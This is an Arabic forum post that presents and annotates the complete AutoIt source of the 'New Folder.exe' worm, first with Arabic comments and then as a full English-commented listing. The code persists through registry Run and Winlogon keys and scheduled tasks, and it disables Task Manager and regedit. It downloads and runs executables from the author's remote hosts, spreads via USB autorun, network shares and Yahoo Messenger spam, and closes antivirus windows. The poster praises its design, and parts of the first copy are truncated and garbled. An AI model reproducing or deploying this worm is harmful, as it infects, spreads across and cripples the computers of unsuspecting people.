شرح اكواد AutoIt فايرس new folder.exeمع شرح الكود

‏windows 8 · منذ /11-07-2012, 04:12 AM

[ , شرح , ] , اكواد , AutoIt , , لفيرس , new , folder.exeمع , شرح , الكود

شرح اكواد AutoIt فايرس new folder.exeمع شرح الكود

بسم الله الرحمن الرحيم
هوا كود فيرس شهير اسموNew Folder.exe
اولا هحط الكود مع الشرح الخاص به

$name = "SSVICHOSST"; اسم الفايروس
$setting = "setting"; ملف الفايروس
$ini = ".ini"
$nql = ".nql"
$xls = ".xls"
$exe = ".exe"
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30
يقوم بنسخ نفسه في المجلد الرئيسي
FileCopy (@AutoItExe, @SystemDir & "\" & $name & $exe,0)
هنا يقوم بحماية نفسه الاختفاء او للقراءة فقط او مجلد نظام
FileSetAttrib (@SystemDir & "\" & $name & $exe,"+RSH")
نسخ نفسه الى مجلد النظام
FileCopy (@AutoItExe, @WindowsDir & "\" & $name & $exe,0)
يقوم بحماية نفسه عبر الاياليب السابقة
FileSetAttrib (@WindowsDir & "\" & $name & $exe,"-RSH")
يقوم بانشاء مداخل في الروجستري ليشتغل تلقائيا مع الويندوز
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","****************l","R EG_RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","Yahoo Messengger","; الغاء option des dossiers لهذا لا يمكنكم رؤيتها في الشريط
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","NofolderOptions"," ; الغاء ادارة المهام
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableTaskMgr",; الغاء محرر الروجستري
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableRegistryTools",; انشاء جدول ليشتغل تلقائيا و في الوقت المحدد
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Serv ices\Schedule","AtTaskMaxHours","REG__RunDOS ("AT /delete /yes")
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
createini()
update()
sendmess()
قراءة الملفات المشتركة و بهذا يقوم بنشر نفسه في الشبكة
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\If $a ="" Then
copynetwork ()
EndIf
If $a "" Then
If FileExists ($a)=0 Then
copynetwork()
EndIf
EndIf
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
نسخ نفسه الى كل فلاش مموري متصلة بالكمبيوتر
While (1)
killprocess()
copyusb()
If @HOUR = $toigioupdate Then
update()
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
EndIf
If @MIN = $toigio Then
sendmess()
EndIf
WEnd
يقوم بتحميل الاعدادات من موقع الصانع و الله اعلم ان كانت فكرة اخرى اضيفوها
Func downloadurl()
$settingurl="http://nhatquanglan3.t35.com"
If InetGet ($settingurl & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
Sleep (1000)
$downloaded="success"
$settingurl1 = "http://nhatquanglan4.t35.com"
If IniRead (@SystemDir & "\" & $setting & $ini,"setting","downloaded","") $downloaded Then
If InetGet ($settingurl1 & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl1 & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
EndIf
FileSetAttrib (@SystemDir & "\" & $setting & $ini,"+RSH")
EndFunc
تحديث الفايروس
Func update()
downloadurl()
$website = IniRead (@SystemDir & "\" & $setting & $ini,"setting","website","")
$check01 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload1","")
$check02 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload2","")
$check03 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload3","")
$size01 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size01",""))
$size02 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size02",""))
$size03 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size03",""))
If $check01 "" Then
If Not FileExists (@SystemDir & "\" & $check01 & $exe) Then
If InetGet ($website & "/" & $check01 & $nql,@SystemDir & "\" & $check01 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check01 & $xls,@SystemDir & "\" & $check01 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check01 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check01 & $exe))/1024>=$size01 Then
FileSetAttrib (@SystemDir & "\" & $check01 & $exe,"+RSH")
Run (@SystemDir & "\" & $check01 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check02 "" Then
If Not FileExists (@SystemDir & "\" & $check02 & $exe) Then
If InetGet ($website & "/" & $check02 & $nql,@SystemDir & "\" & $check02 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check02 & $xls,@SystemDir & "\" & $check02 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check02 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check02 & $exe))/1024>=$size02 Then
FileSetAttrib (@SystemDir & "\" & $check02 & $exe,"+RSH")
Run (@SystemDir & "\" & $check02 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check03 "" Then
If Not FileExists (@SystemDir & "\" & $check03 & $exe) Then
If InetGet ($website & "/" & $check03 & $nql,@SystemDir & "\" & $check03 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check03 & $xls,@SystemDir & "\" & $check03 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check03 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check03 & $exe))/1024>=$size03 Then
FileSetAttrib (@SystemDir & "\" & $check03 & $exe,"+RSH")
Run (@SystemDir & "\" & $check03 & $exe)
EndIf
EndIf
EndIf
EndIf
$toigioupdate = @HOUR + 2
If $toigioupdate >12 Then
$toigioupdate = $toigioupdate -12
EndIf
EndFunc
انشاء رسالة ليرسلها الى جميع الايميلات في الياهو
Func sendmess()
$myweb = IniRead (@SystemDir & "\" & $setting & $ini,"setting","myweb","")
If $myweb = "" Then
$myweb = "http://nhatquanglan1.0catch.com"
EndIf
Dim $tin [10]
$tin[0] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[0]","")
If $tin[0] = "" Then
$tin[0] = "E may, vao day coi co con nho nay ngon lam " & $myweb & " "
EndIf
$tin[1] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[1]","")
If $tin[1] = "" Then
$tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[2] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[2]","")
If $tin[2] = "" Then
$tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[3] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[3]","")
If $tin[3] = "" Then
$tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
EndIf
$tin[4] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[4]","")
If $tin[4] = "" Then
$tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
EndIf
$tin[5] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[5]","")
If $tin[5] = "" Then
$tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo EndIf
$tin[6] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[6]","")
If $tin[6] = "" Then
$tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung EndIf
$tin[7] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[7]","")
If $tin[7] = "" Then
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan EndIf
$tin[8] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[8]","")
If $tin[8] = "" Then
$tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo EndIf
$tin[9] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[9]","")
If $tin[9] = "" Then
$tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang EndIf
اختيار جميع الايميلات في الياهو ليرسل عنوان الموقع للتحميل منه$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut ($tin[$ngaunhien])
BlockInput (1)
WinActivate ($tieude)
Send ("!m")
Send ("un")
Send ("^v {ENTER}{ENTER}")
Send ("^m")
Send ("{DOWN}")
Send ("^{SHIFTDOWN}{END}{SHIFTUP}")
Send ("{ENTER}")
Send ("^v {ENTER}")
BlockInput (0)
EndIf
$toigio=@MIN + 30
If $toigio>60 Then
$toigio=$toigio-60
EndIf
EndFunc
دالة لقتل الانتي فايروس و ادارة المهام ومحرر الروجستري واداة الدوس
Func killprocess()
If WinExists ("Bkav2006") Then
WinClose ("Bkav2006")
RegDelete ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run","BkavFw")
EndIf
If WinExists ("System Configuration") Then
WinClose ("System Configuration")
EndIf
If WinExists ("Registry") Then
WinClose ("Registry")
EndIf
If WinExists ("Windows Task") Then
WinClose ("Windows Task")
EndIf
If WinExists ("[FireLion]") Then
RegDelete ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","IEProtection")
Shutdown (2)
EndIf
If ProcessExists ("cmd.exe") then
ProcessClose ("cmd.exe")
EndIf
EndFunc
دالة نسخ نفسه في الفلاش مموري
Func copyusb()
$usb = DriveGetDrive("REMOVABLE")
If NOT @error Then
Dim $odia[6]
$odia[1]=""
For $i=1 To $usb[0]
$odia[$i-1]=$usb[$i]
Next
If $odia[0] "A:" Then
If $odia[0]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[0] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[0] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[0] & "\autorun.inf",0)
FileSetAttrib ($odia[0] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[0])
EndIf
EndIf
If $odia[0]="A:" Then
If $odia[1]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[1] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[1] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[1] & "\autorun.inf",0)
FileSetAttrib ($odia[1] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[1])
EndIf
EndIf
EndIf
EndFunc
دالة البحث ونقل نفسه الى مجلد النظام
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file "." Or $file "..") Then
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf
Sleep (1)
WEnd
FileClose($search)
EndFunc
دالة نقل نفسه الى مجلد الشبكة
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\If @error Then ExitLoop
$read = StringReplace ($read,"/","\")
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1)
If $checkcopy =1 Then
FileCopy (@SystemDir & "\" & $name & $exe,$mang[$i] & "\" & $name & $exe,0)
FileCopy (@SystemDir & "\autorun.ini",$mang[$i] & "\autorun.inf",1)
FileSetAttrib ($mang[$i] & "\autorun.inf","+RSH")
Search($mang[$i])
EndIf
Next
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\EndFunc
دالة انشاء ملف اوتو رن Func createini()
IniWrite (@SystemDir & "\autorun.ini","Autorun","Open",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************lexe cute",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l\Open\c ommand",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l","Open ")
Sleep (1)
FileSetAttrib (@SystemDir & "\autorun.ini","+RSH")
EndFunc

هذا شرح وافى للفيرس وآلية تشغيله

وثانيا وهوا الاهم الكود كاملا

كود:

; ----------------------------------------------------------------------------
;
; New Folder.exe Code analyzed By Koudelka... Lebanese By Nature...Proud By Choice
; Note: You can rebuild this script using AutoIt program from http://www.autoitscript.com/autoit3/
; First part of this code is to add functions used in the virus like _ProcessGetName and _ProcessGetPriority
;
; ----------------------------------------------------------------------------
; ----------------------------------------------------------------------------
;
; Description: Functions that assist with process management.
;
; ------------------------------------------------------------------------------
;================================================= ==============================
;
; Description - Returns a string containing the process name that belongs to a given PID.
; Syntax - _ProcessGetName( $iPID )
; Parameters - $iPID - The PID of a currently running process
; Requirements - None.
; Return Values - Success - The name of the process
; Failure - Blank string and sets @error
; 1 - Process doesn't exist
; 2 - Error getting process list
; 3 - No processes found
; Notes - Supplementary to ProcessExists().
;================================================= ==============================
Func _ProcessGetName($i_PID)
If Not ProcessExists($i_PID) Then
SetError(1)
Return ''
EndIf
Local $a_Processes = ProcessList()
If Not @error Then
For $i = 1 To $a_Processes[0][0]
If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0]
Next
EndIf
SetError(1)
Return ''
EndFunc ;==>_ProcessGetName
;================================================= ==============================
;
; Function Name: _ProcessGetPriority()
; Description: Get the priority of an open process
; Parameter(s): $vProcess - PID or name of a process.
; Requirement(s): AutoIt Beta v3.1.1.61+
; kernel32.dll (included with Windows)
; Return Value(s): On Success - Returns integer corressponding to
; the processes's priority:
; 0 - Idle/Low
; 1 - Below Normal (Not supported on Windows 95/98/ME)
; 2 - Normal
; 3 - Above Normal (Not supported on Windows 95/98/ME)
; 4 - High
; 5 - Realtime
; On Failure: Returns -1 and sets @Error to 1
;
;================================================= ==============================
;
Func _ProcessGetPriority($vProcess)
Local $i_PID = ProcessExists($vProcess)
If Not $i_PID Then
SetError(1)
Return -1
EndIf
Local $hDLL = DllOpen('kernel32.dll')
Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $aProcessHandle[0])
DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0])
DllClose($hDLL)
Switch $aPriority[0]
Case 0x00000040
Return 0
Case 0x00004000
Return 1
Case 0x00000020
Return 2
Case 0x00008000
Return 3
Case 0x00000080
Return 4
Case 0x00000100
Return 5
Case Else
SetError(1)
Return -1
EndSwitch
EndFunc ;==>_ProcessGetPriority
;================================================= ==============================
;
; Description: Executes a DOS command in a hidden command window.
; Syntax: _RunDOS( $sCommand )
; Parameter(s): $sCommand - Command to execute
; Requirement(s): None
; Return Value(s): On Success - Returns the exit code of the command
; On Failure - Depends on RunErrorsFatal setting
;
;================================================= ==============================
Func _RunDOS($sCommand)
Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc ;==>_RunDOS
; ----------------------------------------------------------------------------
;
; ----------------------------------------------------------------------------
; ----------------------------------------------------------------------------
; Virus Code Start From here
; ----------------------------------------------------------------------------
　
#NoTrayIcon ; used to hide the virus from the tray icon
$name = "SSVICHOSST" ; name of the virus
$setting = "setting" ; setting file used later
$ini = ".ini"
$nql = ".nql"
$xls = ".xls"
$exe = ".exe"
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30
; Copy itself to system directory
FileCopy (@AutoItExe, @SystemDir & "\" & $name & $exe,0)
; Make itself protected (readonly, system, hidden)
FileSetAttrib (@SystemDir & "\" & $name & $exe,"+RSH")
; Copy itself to windows directory
FileCopy (@AutoItExe, @WindowsDir & "\" & $name & $exe,0)
; Make itself protected (readonly, system, hidden)
FileSetAttrib (@WindowsDir & "\" & $name & $exe,"-RSH")
; Create registery keys so it run with windows automatically
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","****************l","R EG_SZ","Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)
; Disable Folder option so you cant see it from the tools menu from Explorer
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","NofolderOptions"," REG_DWORD",1)
; Disable Task Manager (Ctrl+Alt+Delete)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)
; Disable regedit
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)
; Make schedule to run the virus automatically at specified time
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Serv ices\Schedule","AtTaskMaxHours","REG_DWORD",0)
_RunDOS ("AT /delete /yes")
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
createini()
update()
sendmess()
; Read Shared folders from the registery and that so it can copy itself there
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\Shares","sha red")
If $a ="" Then
copynetwork ()
EndIf
If $a "" Then
If FileExists ($a)=0 Then
copynetwork()
EndIf
EndIf
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
; Copy itself to Flash memory to infect any usb attached to the computer
While (1)
killprocess()
copyusb()
If @HOUR = $toigioupdate Then
update()
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
EndIf
If @MIN = $toigio Then
sendmess()
EndIf
WEnd
; It download settings from the Author of the virus website i didnt study this too much but its really nice idea

Func downloadurl()
$settingurl="http://nhatquanglan3.t35.com"
If InetGet ($settingurl & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
Sleep (1000)
$downloaded="success"
$settingurl1 = "http://nhatquanglan4.t35.com"
If IniRead (@SystemDir & "\" & $setting & $ini,"setting","downloaded","") $downloaded Then
If InetGet ($settingurl1 & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl1 & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
EndIf
FileSetAttrib (@SystemDir & "\" & $setting & $ini,"+RSH")
EndFunc
; Update the virus

شرح اكواد AutoIt فايرس new folder.exeمع شرح الكود biggrin.gif

didnt i tell u nice idea

Func update()
downloadurl()
$website = IniRead (@SystemDir & "\" & $setting & $ini,"setting","website","")
$check01 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload1","")
$check02 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload2","")
$check03 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload3","")
$size01 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size01",""))
$size02 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size02",""))
$size03 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size03",""))
If $check01 "" Then
If Not FileExists (@SystemDir & "\" & $check01 & $exe) Then
If InetGet ($website & "/" & $check01 & $nql,@SystemDir & "\" & $check01 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check01 & $xls,@SystemDir & "\" & $check01 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check01 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check01 & $exe))/1024>=$size01 Then
FileSetAttrib (@SystemDir & "\" & $check01 & $exe,"+RSH")
Run (@SystemDir & "\" & $check01 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check02 "" Then
If Not FileExists (@SystemDir & "\" & $check02 & $exe) Then
If InetGet ($website & "/" & $check02 & $nql,@SystemDir & "\" & $check02 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check02 & $xls,@SystemDir & "\" & $check02 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check02 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check02 & $exe))/1024>=$size02 Then
FileSetAttrib (@SystemDir & "\" & $check02 & $exe,"+RSH")
Run (@SystemDir & "\" & $check02 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check03 "" Then
If Not FileExists (@SystemDir & "\" & $check03 & $exe) Then
If InetGet ($website & "/" & $check03 & $nql,@SystemDir & "\" & $check03 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check03 & $xls,@SystemDir & "\" & $check03 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check03 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check03 & $exe))/1024>=$size03 Then
FileSetAttrib (@SystemDir & "\" & $check03 & $exe,"+RSH")
Run (@SystemDir & "\" & $check03 & $exe)
EndIf
EndIf
EndIf
EndIf
$toigioupdate = @HOUR + 2
If $toigioupdate >12 Then
$toigioupdate = $toigioupdate -12
EndIf
EndFunc
; Create message to send it to all your contacts in yahoo messenger

شرح اكواد AutoIt فايرس new folder.exeمع شرح الكود smile.gif

Func sendmess()
$myweb = IniRead (@SystemDir & "\" & $setting & $ini,"setting","myweb","")
If $myweb = "" Then
$myweb = "http://nhatquanglan1.0catch.com"
EndIf
Dim $tin [10]
$tin[0] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[0]","")
If $tin[0] = "" Then
$tin[0] = "E may, vao day coi co con nho nay ngon lam " & $myweb & " "
EndIf
$tin[1] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[1]","")
If $tin[1] = "" Then
$tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[2] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[2]","")
If $tin[2] = "" Then
$tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[3] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[3]","")
If $tin[3] = "" Then
$tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
EndIf
$tin[4] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[4]","")
If $tin[4] = "" Then
$tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
EndIf
$tin[5] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[5]","")
If $tin[5] = "" Then
$tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " &$myweb &" "
EndIf
$tin[6] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[6]","")
If $tin[6] = "" Then
$tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $myweb & " "
EndIf
$tin[7] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[7]","")
If $tin[7] = "" Then
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $myweb & " "
EndIf
$tin[8] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[8]","")
If $tin[8] = "" Then
$tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $myweb & " "
EndIf
$tin[9] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[9]","")
If $tin[9] = "" Then
$tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $myweb & " "
EndIf
; select all your contact in yahoo messenger and send them the message created above with the website to download the virus
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut ($tin[$ngaunhien])
BlockInput (1)
WinActivate ($tieude)
Send ("!m")
Send ("un")
Send ("^v {ENTER}{ENTER}")
Send ("^m")
Send ("{DOWN}")
Send ("^{SHIFTDOWN}{END}{SHIFTUP}")
Send ("{ENTER}")
Send ("^v {ENTER}")
BlockInput (0)
EndIf
$toigio=@MIN + 30
If $toigio>60 Then
$toigio=$toigio-60
EndIf
EndFunc
; Function to kill antivirus, registery, task manager, command(cmd) in case they are running
Func killprocess()
If WinExists ("Bkav2006") Then
WinClose ("Bkav2006")
RegDelete ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run","BkavFw")
EndIf
If WinExists ("System Configuration") Then
WinClose ("System Configuration")
EndIf
If WinExists ("Registry") Then
WinClose ("Registry")
EndIf
If WinExists ("Windows Task") Then
WinClose ("Windows Task")
EndIf
If WinExists ("[FireLion]") Then
RegDelete ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Run","IEProtection")
Shutdown (2)
EndIf
If ProcessExists ("cmd.exe") then
ProcessClose ("cmd.exe")
EndIf
EndFunc
; Function to copy itself to usb
Func copyusb()
$usb = DriveGetDrive("REMOVABLE")
If NOT @error Then
Dim $odia[6]
$odia[1]=""
For $i=1 To $usb[0]
$odia[$i-1]=$usb[$i]
Next
If $odia[0] "A:" Then
If $odia[0]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[0] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[0] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[0] & "\autorun.inf",0)
FileSetAttrib ($odia[0] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[0])
EndIf
EndIf
If $odia[0]="A:" Then
If $odia[1]"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[1] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[1] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[1] & "\autorun.inf",0)
FileSetAttrib ($odia[1] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[1])
EndIf
EndIf
EndIf
EndFunc
; Function to search and copy itself to windows directory
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file "." Or $file "..") Then
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf
Sleep (1)
WEnd
FileClose($search)
EndFunc
; Function to copy itself to network folders
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\Shares",$i)
If @error Then ExitLoop
$read = StringReplace ($read,"/","\")
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1)
If $checkcopy =1 Then
FileCopy (@SystemDir & "\" & $name & $exe,$mang[$i] & "\" & $name & $exe,0)
